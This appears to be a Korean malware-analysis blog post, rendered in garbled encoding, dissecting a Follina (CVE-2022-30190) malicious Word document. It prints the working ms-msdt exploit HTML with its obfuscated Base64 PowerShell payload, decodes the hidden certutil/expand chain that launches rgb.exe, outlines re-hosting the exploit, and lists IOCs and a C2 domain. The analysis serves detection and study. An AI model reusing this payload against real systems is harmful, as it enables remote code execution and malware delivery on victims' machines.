Follina (CVE-2022-30190)
Follina CVE-2022-30190
MS Word์ ๊ฐ์ ํธ์ถ ์์ฉ ํ๋ก๊ทธ๋จ์์ URL ํ๋กํ ์ฝ์ ์ฌ์ฉํ์ฌ MSDT๋ฅผ ํธ์ถํ ๋ ์๊ฒฉ ์ฝ๋ ์คํ ์ทจ์ฝ์ ์ด ๋ฐ์ํ๋ค.
ํด๋น ์ทจ์ฝ์ ๋ฐ์ ์ ํธ์ถ ์์ฉ ํ๋ก๊ทธ๋จ์ ๊ถํ์ผ๋ก ์์ ์ฝ๋๋ฅผ ์คํํ ์ ์์ผ๋ฉฐ ์ถ๊ฐ ํ๋ก๊ทธ๋จ์ ์ค์นํ๊ฑฐ๋ ๋ฐ์ดํฐ ํ์ธ ๋ฐ ๋ณ๊ฒฝ ๋๋ ์ญ์ ๊ฐ ๊ฐ๋ฅํ๋ค.
MSDT (Microsoft Support Diagnostic Tool) ?
Microsoft ์ง์ ์ง๋จ ๋๊ตฌ๋ก MS์ ์ง์ ์ ๋ฌธ๊ฐ์ ๋ถ์์ ์ํด ์ง๋จ ๋ฐ์ดํฐ๋ฅผ ์์งํ๋๋ฐ ์ฌ์ฉ๋๋ ์๋์ฐ ๊ธฐ๋ณธ ๋ด์ฅ ๋๊ตฌ์ด๋ค.
MS์์ ๊ณต์์ ์ผ๋ก 2023๋ 1์ ์ฌ์ฉ ์ค๋จ ๋ฐํ๋์๋ค.
1. Follina ์ ์ฑ ์ฝ๋ ๋ถ์
Follina Word ๋ฌธ์ํ ์ ์ฑ์ฝ๋๋ฅผ ์์ถ ํด์ ํ๋ฉด ์๋ ์ฒ๋ผ ๊ด๋ จ ๊ตฌ์ฑ ํด๋๋ฅผ ํ์ธ ํ ์ ์๋ค.
document.xml.rels ํ์ผ์ ํ์ธํ๋ฉด External ํ๊ทธ๋ฅผ ํ์ธํ ์ ์๋ค.
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!" TargetMode="External"/>
ํ์ฌ๋ ํด๋น Target์ URL์ด ๋นํ์ฑํ ๋์ด์์ด ์ถ๊ฐ ๋์์ ์ํ ๋์ง ์๋๋ค.
์๋๋ RDF842l.html์ ์๋ณธ ์ฝํ
์ธ ์ด๋ค.
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-- ์ค๋ต --
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force
/param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed
IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../..//Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
</body>
</html>
2. Payload ๋ถ์
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../..//Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
ํด๋น ์คํฌ๋ฆฝํธ๋ฅผ ๋ธ๋ผ์ฐ์ ์์ ์คํํด๋ณด๋ฉด Microsoft ์ง์ ์ง๋จ ๋ง๋ฒ์ฌ ์คํ ํ์ ์ด ๋ฐ์ํ๋ค.
Payload๋ฅผ Base64 Decode๋ฅผ ํ๋ฉด ์๋ ๋ช
๋ น๋ค์ ํ์ธํ ์ ์๊ณ , ํด๋น ์์๋ก Exploit์ด ์งํ๋๋ค.
05-2022-0438.rar๋ก ์์๋๋ rgb.exe ํ์ผ์ ํ์ธํ ์ ์๊ธฐ์, ๊ตฌ์ฒด์ ์ธ ๊ณต๊ฒฉ ์ํฅ๋๋ ํ์ธ์ด ๋ถ๊ฐํ๋ค.
$cmd = "c:\windows\system32\cmd.exe"; # CMD ์คํ
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; # ๊ณต๊ฒฉ์ ์ฌ์ฉ๋ MSDT๊ฐ ์คํ ์ค์ด๋ฉด ์ข
๋ฃ
Start-Process $cmd -windowstyle hidden -ArgumentList "/c
cd C:\users\public\&&
for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&& #
findstr TVNDRgAAAA 1.rar>1.t&&
certutil -decode 1.t 1.c &&
expand 1.c -F:* .&&
rgb.exe";
# %temp% ํด๋์ 05-2022-0438.rar ํ์ผ์ public ํด๋์ 1.rar๋ก ๋ณต์ฌํ๋ค.
# 1.rar ํ์ผ์์ TVNDRgAAAA ํจํด์ ์ฐพ์ 1.t ํ์ผ์ ์์ฑํ๋ค.
# 1.t ํ์ผ์ Base64 Decodeํ์ฌ 1.c ํ์ผ์ ์์ฑํ๋ค.
# 1.c CAB ํ์ผ์ ํ์ฌ ํด๋์ ํ์ฅ(์์ถํด์ )ํ๋ค.
# rgb.exe๋ฅผ ์คํํ๋ค.
# TVNDRgAAAA์ Base64 Decode ๊ฐ์ MSCF๋ก CAB ํ์ผ์ Magic Number ์ด๋ค.
3. Exploit ์ฌํ
ํ์ฌ๋ ํด๋น ์
์ฑ ํ์ผ ์์ฒด๋ก๋ ์ฌํ์ด ๋ถ๊ฐํ์ฌ ์
์ฑ ํ์ผ ๋ฐ Payload๋ฅผ ์ฌ๊ตฌ์ฑํ์ฌ ๊ณ์ฐ๊ธฐ๋ฅผ ์คํํ๋๋ก ์์ฑํ๋ค.
๋จผ์ Word์์ ์ธ๋ถ ํ์ผ์ ๋ฐ์์ค๋ URL์ ์ ํจํ ๊ณต๊ฒฉ์ ์ฃผ์๋ก ๋ณ๊ฒฝํ๋ค.
๋ํ RDF8421.html์์ ์คํ๋ Payload๋ ๋ณ๊ฒฝํ๋ค.
๊ณ์ฐ๊ธฐ๋ฅผ ์คํํ๋๋ก Powershell์ ์์ฑํ๊ณ Base64 Encoding์ ์งํํด์ค๋ค.
๋ณ๊ฒฝ๋ Payload๋ฅผ RDF8421.html์ ๋ฐ์ ํ ๊ณต๊ฒฉ์ ์๋ฒ์์ ํ์ผ์ ํธ์คํ ํ๋ค.
ํ์ง๋ง ์ฌํ ํด๋ณด๋ Windows๊ฐ ์ด๋ฏธ ํจ์น๋ ๋ฒ์ ์ด๋ผ ์งํ์ด ์๋๋๊ฑธ๋ก ๋ณด์ธ๋ค.
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190
4. Follina IOC
Follina ์
์ฑ์ฝ๋๋ ๋ฌธ์ํ ์
์ฑ์ฝ๋๋ก ์๋ IOC์ ๊ฐ์ง๊ณ ์๋ค.
IOC
52945af1def85b171870b31fa4782e52
8ee8fe6f0226e346e224cd72c728157c
6bcee92ab337c9130f27143cc7be5a55
f531a7c270d43656e34d578c8e71bc39
529c8f3d6d02ba996357aba535f688fc
d313002804198b5af1e0b537799be348
4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
C2: www.xmlformats[.]com (141[.]105.65.149)
์ฐธ๊ณ
https://asec.ahnlab.com/ko/34919/
https://www.socinvestigation.com/new-microsoft-office-zero-day-follina-detection-response/
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190
https://github.com/JohnHammond/msdt-follina
'๐์ ์ฑ์ฝ๋ ๋ถ์' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
์ ์ฑ์ฝ๋ ์ํ ์์ง ์ฌ์ดํธ (0) | 2023.09.13 |
---|
๋๊ธ
์ด ๊ธ ๊ณต์ ํ๊ธฐ
-
๊ตฌ๋
ํ๊ธฐ
๊ตฌ๋ ํ๊ธฐ
-
์นด์นด์คํก
์นด์นด์คํก
-
๋ผ์ธ
๋ผ์ธ
-
ํธ์ํฐ
ํธ์ํฐ
-
Facebook
Facebook
-
์นด์นด์ค์คํ ๋ฆฌ
์นด์นด์ค์คํ ๋ฆฌ
-
๋ฐด๋
๋ฐด๋
-
๋ค์ด๋ฒ ๋ธ๋ก๊ทธ
๋ค์ด๋ฒ ๋ธ๋ก๊ทธ
-
Pocket
Pocket
-
Evernote
Evernote
๋ค๋ฅธ ๊ธ
-
์ ์ฑ์ฝ๋ ์ํ ์์ง ์ฌ์ดํธ
์ ์ฑ์ฝ๋ ์ํ ์์ง ์ฌ์ดํธ
2023.09.13